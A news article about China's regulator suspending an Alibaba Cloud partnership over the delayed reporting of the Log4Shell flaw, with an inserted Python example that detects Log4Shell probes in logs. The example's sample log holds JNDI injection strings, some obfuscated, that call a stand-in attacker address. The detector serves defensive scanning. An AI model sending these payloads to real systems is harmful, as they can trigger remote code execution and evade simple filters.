The Ministry of Industry and Information Technology (MIIT), China’s internet regulator, has suspended its partnership with Alibaba Cloud for six months for failing to report a significant security flaw in the widely used Log4j logging framework in a timely manner. Alibaba Cloud Computing is a subsidiary of the e-commerce behemoth Alibaba Group.
Reuters and the South China Morning Post reported on the development, citing a report from the 21st Century Business Herald, a Chinese business daily newspaper. The critical security flaw, nicknamed Log4Shell or LogJam and tracked as CVE-2021-44228 (CVSS score: 10.0), lets malicious actors remotely execute code by getting the software to log a specially crafted string.
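Because the flaw is triggered by whatever string ends up in a log line, defenders hunted for it by scanning existing logs. The following added example (not from the article or from Alibaba Cloud) shows that kind of detection over a constructed access log: it collapses the nested-lookup obfuscation that attackers used to evade naive `${jndi:` string matches before checking each line. The sample log lines, the 198.51.100.7 address and the function names are all constructed for illustration.

```python
import re

# Innermost ${...} lookup, i.e. one whose body contains no further "${".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalization a probe reads as "${jndi:<scheme>:..."; match case-insensitively.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(match: re.Match) -> str:
    """Evaluate one innermost lookup the way Log4j would: ':-' default
    values and lower/upper case transforms; anything else is left as-is."""
    body = match.group(1)
    if ":-" in body:
        return body.split(":-", 1)[1]          # ${x:-val} and ${::-val} -> val
    kind, _, arg = body.partition(":")
    if kind.lower() == "lower":
        return arg.lower()
    if kind.lower() == "upper":
        return arg.upper()
    return match.group(0)

def normalize(line: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups inside-out so obfuscated forms such as
    ${${lower:j}ndi:...} or ${${::-j}ndi:...} read as ${jndi:...}."""
    for _ in range(max_rounds):
        collapsed = _INNER.sub(_resolve, line)
        if collapsed == line:
            break
        line = collapsed
    return line

def is_log4shell_probe(line: str) -> bool:
    """True when the line carries a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize(line)) is not None

def scan(lines):
    """Return the indices of log lines that look like Log4Shell probes."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]

# Constructed web-server access log (not real traffic); 198.51.100.7 is a
# documentation-range address standing in for an attacker-controlled host.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login" 200 "${jndi:ldap://198.51.100.7/a}"',
    '10.0.0.9 - - "GET /login" 200 "${${lower:j}${upper:n}di:rmi://198.51.100.7/b}"',
    '10.0.0.9 - - "GET /login" 200 "${${::-j}ndi:${lower:ldap}://198.51.100.7/c}"',
    '10.0.0.7 - - "GET /api" 200 "${date:yyyy-MM-dd}"',  # benign-looking lookup
]
```

Running `scan(SAMPLE_LOG)` flags lines 1 to 3 and leaves the benign `${date:...}` lookup alone; in practice the same normalization should be applied to every logged field (headers, user agents, form values), since any of them may reach Log4j.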
Since the bug was made public, threat actors have used Log4Shell extensively to gain control of vulnerable servers. The library is in near-universal use for logging security and performance information in consumer and commercial services, websites, and apps, as well as in operational technology solutions.
On November 24, Chen Zhaojun of Alibaba Cloud was credited with reporting the problem. Further cybersecurity research into Log4j has revealed three additional issues in the Java-based library, forcing the Apache Software Foundation (ASF) to release a series of updates to prevent real-world attacks leveraging the flaws.
Check Point, an Israeli security firm, claims to have blocked more than 4.3 million exploitation attempts so far, with 46 percent of those incursions coming from known criminal organizations. “This vulnerability may cause the device to be remotely controlled, which will cause serious hazards such as theft of sensitive information and device service interruption,” the MIIT earlier stated in a public statement on December 17.
The decision also comes months after the Chinese government enacted new, more stringent vulnerability disclosure requirements, which oblige software and networking firms affected by serious vulnerabilities to report them immediately to government authorities.
In September, the government followed up by releasing “cyberspace security and vulnerability professional databases” for reporting security flaws in networks, mobile applications, industrial control systems, IoT devices, smart cars, and other internet-connected products that threat actors may target.